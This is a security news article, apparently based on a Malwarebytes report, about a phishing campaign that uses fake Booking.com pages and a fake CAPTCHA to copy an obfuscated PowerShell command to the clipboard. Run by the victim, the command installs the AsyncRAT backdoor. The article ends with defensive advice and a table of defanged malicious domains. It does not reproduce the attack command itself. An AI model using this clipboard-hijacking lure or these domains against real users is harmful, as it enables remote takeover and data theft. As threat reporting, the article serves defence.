A rapidly evolving phishing campaign is exploiting the popularity of online travel bookings by leveraging fake Booking.com sites to deploy the dangerous Backdoor.AsyncRAT malware.
Since mid-May, security researchers at Malwarebytes have tracked this campaign as it spreads through redirect links on gaming websites, social media, and sponsored advertisements, luring unsuspecting travelers searching for hotel deals and accommodations.
This approach is particularly effective, as 40% of users reportedly rely on general online searches for booking travel arrangements, making them a ripe target for cybercriminals.
The threat actors behind the campaign are constantly rotating their malicious domains, changing the landing page URLs every two to three days to evade blacklists and security detections.
Fake Captcha and Clipboard Hijacking
Upon clicking a booby-trapped link, users are redirected through a series of intermediary sites, ultimately landing on a webpage meticulously designed to resemble Booking.com.
According to MalwareBytes Report, the fraudulent site initiates a deceptive security check, displaying a fake CAPTCHA prompt.

Unlike legitimate CAPTCHA systems, this one serves a sinister purpose: it tricks victims into granting the website permission to copy malicious code to their clipboard.
Once the unsuspecting user completes the prompt, the site instructs them to paste the clipboard contents into their Windows Run dialog and execute it.
This method is particularly insidious because it co-opts the victim into unwittingly launching a PowerShell command on their own device a technique never employed by authentic CAPTCHA or booking platforms.
The PowerShell script itself is heavily obfuscated, employing mixed casing, erratic quote usage, and variable manipulation to evade casual detection and automated security tools.

Deobfuscated, it connects to a command-and-control server (such as bkngnet[.]com
) to download and execute further malicious payloads, specifically ckjg.exe
and subsequently Stub.exe
.
These executables are identified as carriers of Backdoor.AsyncRAT, a powerful remote access trojan.
The Danger of AsyncRAT
Backdoor.AsyncRAT grants attackers full remote control over infected devices. Once embedded, it can exfiltrate sensitive data, log keystrokes, record screens, and even commandeer webcams and microphones.
The implications are severe: affected users risk financial loss, identity theft, and long-term surveillance until the threat is eradicated.
While browsers like Chrome display generic warnings when clipboard access is triggered, such alerts may fail to properly communicate the gravity of the threat to most users.
Security solutions like Malwarebytes Browser Guard take an additional step by flagging suspicious clipboard activity and appending warning messages to potentially destructive commands, effectively neutralizing the immediate risk. However, users lacking such layered protections remain dangerously exposed.
In this era of relentless malware innovation, user awareness and proactive cyber hygiene are the best defenses.
Users should never execute commands provided by unfamiliar websites and must scrutinize prompts that request permission to interact with system features like the clipboard or the Windows Run utility.
Deploying reputable anti-malware solutions, enabling browser-based protection against malicious scripts and domains, and maintaining vigilance while booking travel online are essential practices.
Disabling JavaScript can prevent clipboard hijacking by blocking functions like document.execCommand('copy')
, but this often impairs the functionality of legitimate sites.
A practical workaround is to use separate browsers: one restricted for general browsing with enhanced security settings, and another for accessing trusted sites and web applications.
As cybercriminals continue to refine their techniques and rapidly rotate their infrastructure to avoid detection, robust endpoint protection and informed skepticism remain critical.
Cybercriminal threats are evolving in sophistication and frequency. Staying informed and maintaining a healthy skepticism online is fundamental as attackers continue to target high-traffic platforms with advanced social engineering and technical tactics.
IOCs Table
Domain/Subdomain |
---|
booking.chargesguestescenter[.]com |
booking.badgustrewivers.com[.]com |
booking.property-paids[.]com |
booking.rewiewqproperty[.]com |
booking.extranet-listing[.]com |
booking.guestsalerts[.]com |
booking.gustescharge[.]com |
kvhandelregis[.]com |
patheer-moreinfo[.]com |
guestalerthelp[.]com |
rewiewwselect[.]com |
hekpaharma[.]com |
bkngnet[.]com |
partnervrft[.]com |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates